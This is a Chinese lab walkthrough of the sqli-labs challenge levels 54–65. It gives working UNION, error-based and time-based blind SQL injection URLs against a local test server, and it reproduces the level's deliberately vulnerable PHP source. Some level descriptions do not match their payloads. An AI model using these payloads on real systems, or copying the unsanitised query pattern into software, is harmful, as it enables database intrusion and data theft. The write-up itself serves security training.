文章目录
54.less54-Challenge-1
54.1、注入解析–十次刷新
源码中设置了一个times变量为10,用来控制注入的语句次数的,超过了这个次数,数据库中表名和密码等将会进行重置更新。
- 1、获取数据库的表名:
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
由上可得表名为 plmmlsw7pm
。
- 2、获取数据库的列
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges'and table_name='plmmlsw7pm'--+
如下,可以知道表的所有列为:id,sessid,secret_X2ZO,tryy
- 3、尝试着对列名中的数据进行查看
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,group_concat(id),group_concat(sessid) from plmmlsw7pm--+
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,group_concat(secret_X2ZO),group_concat(tryy) from plmmlsw7pm--+
在这里我们知道了secret_X2ZO中存放着我们的密码,即密码为 LMowZDNDDp2WV4lP9G0zNGkr
,因此我们将密码在下买你的框中进行提交。
成功的截图一闪而过,我就不贴了,可自行测试欣赏成功的魅力!
如下,你成功了,数据库也成功更新了,呵,就是这么的现实。
54.2、代码赏析
由于不允许上传文件,所以我把基本上整段代码都复制过来,怎么说呢,值得好好研究一番吧,确实挺神奇的!
- 比如,他这个数据库是怎么实现名字刷新的呢?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-54:Challenge-1</title>
</head>
<body bgcolor="#000000">
<div style ="text-align:right">
<form action="" method="post">
<input type="submit" name="reset" value="Reset the Challenge!" />
</form>
</div>
</right>
<div style=" margin-top:20px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include '../sql-connections/sql-connect-1.php';
include '../sql-connections/functions.php';
error_reporting(0);
$pag = $_SERVER['PHP_SELF']; /*generating page address to piggy back after redirects...
生成页面地址以便在重定向后装载……
一般用来引用当前网页地址,并且它是系统自动生成的全局变量,*/
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; /*characterset for generating random data
生成随机数据的字符集*/
$times= 10;
$table = table_name();
$col = column_name(1);/*session id column name
会话ID列名称*/
$col1 = column_name(2); /*secret key column name
密钥列名称*/
// Submitting the final answer
if(!isset($_POST['answer_key']))//如果点击按钮提交的数据为空
{
// resetting the challenge and repopulating the table .
//重置挑战并重新填充桌子。
if(isset($_POST['reset']))
{
setcookie('challenge', ' ', time() - 3600000);
echo "<font size=4>You have reset the Challenge</font><br>\n";
echo "Redirecting you to main challenge page..........\n";
header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
//echo "cookie expired";
}
else
{
// Checking the cookie on the page and populate the table with random value.
if(isset($_COOKIE['challenge']))
{
$sessid=$_COOKIE['challenge'];
//echo "Cookie value: ".$sessid;
}
else
{
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
}
echo "<br>\n";
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
//update the counter in database
next_tryy();
//Display attempts on screen.
$tryyy = view_attempts();
echo "You have made : ". $tryyy ." of $times attempts";
echo "<br><br><br>\n";
//Reset the Database if you exceed allowed attempts.
//如果超出允许的次数即10次,请重置数据库。
if($tryyy >= ($times+1))
{
setcookie('challenge', ' ', time() - 3600000);
echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
echo "Redirecting you to challenge page..........\n";
header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
echo "<br>\n";
}
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value as done in Lab excercises\n<br><br>\n</font>";
echo "<font color='#00FFFF': size=3>The objective of this challenge is to dump the <b>(secret key)</b> from only random table from Database <b><i>('CHALLENGES')</i></b> in Less than $times attempts<br>";
echo "For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.<br>" ;
}
}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-54.jpg" />
</center>
<br><br><br>
<div style=" color:#00FFFF; font-size:18px; text-align:center">
<form name="input" action="" method="post">
Submit Secret Key: <input type="text" name="key">
<input type="submit" name = "answer_key" value="Submit">
</form>
</div>
<?php
}
else
{
echo '<div style=" color:#00FFFF; font-size:18px; text-align:center">';
$key = addslashes($_POST['key']);
$key = mysql_real_escape_string($key);
//echo $key;
//Query table to verify your result
$sql="SELECT 1 FROM $table WHERE $col1= '$key'";
//echo "$sql";
$result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#FFFF00">';
echo "\n<br><br><br>";
echo '<img src="../images/Less-54-1.jpg" />';
echo "</font>";
header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
}
else
{
echo '<font color= "#FFFF00">';
echo "\n<br><br><br>";
echo '<img src="../images/slap1.jpg" />';
header( "refresh:3;url=index.php" );
//print_r(mysql_error());
echo "</font>";
}
}
?>
</body>
</html>
55.less55-Challenge-2
本关类似于less54,只是将闭合方式改为了 单引号 而已。
http://192.168.10.208:8081/sqli-labs-master/Less-55/index.php?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
56.less56-Challenge-3
本关类似于less54,只是将闭合方式改为了 单引号+括号 而已。
http://192.168.10.208:8081/sqli-labs-master/Less-56/index.php?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
57.less57-Challenge-4
本关类似于less54,只是将闭合方式改为了 双引号 而已。
http://192.168.10.208:8081/sqli-labs-master/Less-57/index.php?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
58.less58-Challenge-5
上面是58关与54 关的源码对比,我们可以看出执行sql语句后,58关没有返回数据库中的语句,所以我们这里不能使用union联合注入,这里使用的是报错注入。
从time也可以看出,这里的语句变成了5次,因此机会需要谨慎使用哦!
http://192.168.10.208:8081/sqli-labs-master/Less-58/index.php?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
59.less59-Challenge-6
与less58类似,只是闭合方式为 数字型 。
http://192.168.10.208:8081/sqli-labs-master/Less-59/index.php?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
60.less60-Challenge-7
与less58类似,只是闭合方式为 双引号+括号 。
http://192.168.10.208:8081/sqli-labs-master/Less-60/index.php?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
61.less61-Challenge-8
与less58类似,只是闭合方式为 单引号+括号+括号 。
http://192.168.10.208:8081/sqli-labs-master/Less-61/index.php?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
62.less62-Challenge-9
如上可见,注入次数time改为了130次。
如图,可见本关与less58类似,但闭合方式为 单引号+括号 ,数据库的错误信息也不进行输出,因此无法进行报错注入;再加上并没有显示数据库中的信息,因此无法进行union注入。
所以最后我们应该使用的是延时注入。
http://192.168.10.208:8081/sqli-labs-master/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
http://192.168.10.208:8081/sqli-labs-master/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=80,0,sleep(5))--+
63.less63-Challenge-10
\
如图,可见本关与less63类似,但闭合方式为 单引号 ,数据库的错误信息也不进行输出,因此无法进行报错注入;再加上并没有显示数据库中的信息,因此无法进行union注入。所以也是只能利用延时注入。
http://192.168.10.208:8081/sqli-labs-master/Less-63/?id=1%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
64.Less-64-Challenge-11
如图,可见本关与less63类似,但闭合方式为 括号 ,数据库的错误信息也不进行输出,因此无法进行报错注入;再加上并没有显示数据库中的信息,因此无法进行union注入。所以也是只能利用延时注入。
http://192.168.10.208:8081/sqli-labs-master/Less-64/?id=1))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
65.Less-65-Challenge-12
如图,可见本关与less63类似,但闭合方式为 双引号+括号 ,数据库的错误信息也不进行输出,因此无法进行报错注入;再加上并没有显示数据库中的信息,因此无法进行union注入。所以也是只能利用延时注入。
http://192.168.10.208:8081/sqli-labs-master/Less-65/?id=1”)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+